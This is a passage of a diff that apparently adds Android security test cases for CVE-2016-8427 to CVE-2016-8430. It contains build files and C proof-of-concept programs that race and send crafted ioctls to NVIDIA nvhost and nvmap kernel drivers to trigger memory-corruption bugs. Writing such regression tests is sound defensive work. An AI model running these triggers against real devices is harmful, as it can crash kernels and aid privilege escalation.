+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+ int ioarg[2];
+ switch ((long)arg) {
+ case 0:
+ fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+ break;
+ case 1:
+ fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+ break;
+ case 2:
+ ioarg[0] = fd_dbg_1;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+ break;
+ case 3:
+ fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+ break;
+ case 4:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ case 5:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ }
+ return 0;
+}
+int poc()
+{
+ long i;
+ pthread_t th;
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ usleep(10000);
+ }
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ if (i%2==0)
+ usleep(10000);
+ }
+ usleep(100000);
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ while(1){
+ pid = fork();
+ if(pid){
+ usleep(30000);
+ }else
+ return poc();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+ __u64 handles; /* Ptr to u32 type array, holding handles */
+ __u64 offsets; /* Ptr to u32 type array, holding offsets
+ * into handle mem */
+ __u64 sizes; /* Ptr to u32 type array, holindg sizes of memory
+ * regions within each handle */
+ __u32 nr; /* Number of handles */
+ __s32 op; /* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+enum {
+ NVMAP_PAGES_UNRESERVE = 0,
+ NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+int trigger_nvmap_create() {
+ g_allocation->handle = -1;
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+ return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.handle = handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+ printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+ ioctl(g_fd, NVMAP_IOC_FREE, handle);
+ printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ int i;
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 0x40;
+
+ g_real_alloc.align = 0x40;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+
+ g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+ g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+ g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+ }
+ g_op_list.nr = MAX_HANDLE_NUM;
+ g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+ int i;
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ g_handles_for_alloc[i] = trigger_nvmap_create();
+ }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+ ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+ printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+ int i;
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ prepare_data();
+ create_handles();
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_nvmap_alloc(g_handles_for_alloc[i]);
+ }
+
+ printf("[*] Begin to trigger bug....\n");
+ sleep(1);
+
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_rw_handle(g_handles_for_alloc[i]);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+ g_allocation_dup.fd = fd;
+ ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ alloc.handle = g_allocation->handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+ ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void prepare_data() {
+ void* data = (void *) memalign(0x1000, 4 * 0x1000);
+ //void* data = malloc(0x10000);
+ printf("[*] data = %p\n", data);
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+ g_allocation->handle = -1;
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-10, 2);
+
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+
+ while (1)
+ close(1024);
+}
+
+int main(int argc, char**argv) {
+
+ setup_privi_and_affinity(-10, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
new file mode 100644
index 0000000..839047b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8430
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
new file mode 100644
index 0000000..0717d0b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
@@ -0,0 +1,204 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+#define NVMAP_IOC_MAGIC 'N'
+
+/* Creates a new memory handle. On input, the argument is the size of the new
+ * handle; on return, the argument is the name of the new handle
+ */
+ #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+int g_fd = -1;
+int g_nvmap_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+int g_channel_fd = -1;
+struct nvhost_set_error_notifier g_error_notifier;
+struct nvmap_create_handle g_nvmap_hdl;
+
+struct nvmap_alloc_handle g_real_alloc = {0};
+
+int open_driver() {
+ char* dev_path = "/dev/nvhost-vic";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+
+ dev_path = "/dev/nvmap";
+ g_nvmap_fd = open(dev_path, O_RDONLY);
+ if (g_nvmap_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+ return 1;
+}
+
+void trigger_channel_open() {
+ struct nvhost_channel_open_args args = {-1};
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
+ g_channel_fd = args.channel_fd;
+}
+
+int trigger_nvmap_create() {
+ g_nvmap_hdl.size = 0x1000;
+ ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
+ return g_nvmap_hdl.handle;
+}
+
+void trigger_nvmap_free() {
+ int data = g_nvmap_hdl.handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
+}
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.align = 0x1000;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ g_real_alloc.handle = handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+}
+void prepare_data() {
+ g_error_notifier.offset = 0;
+ g_error_notifier.mem = g_nvmap_hdl.handle;
+}
+
+void trigger_set_error_notifier() {
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+void* race_thread_2(void* arg) {
+ setup_privi_and_affinity(-19, 1);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ //trigger_nvmap_create();
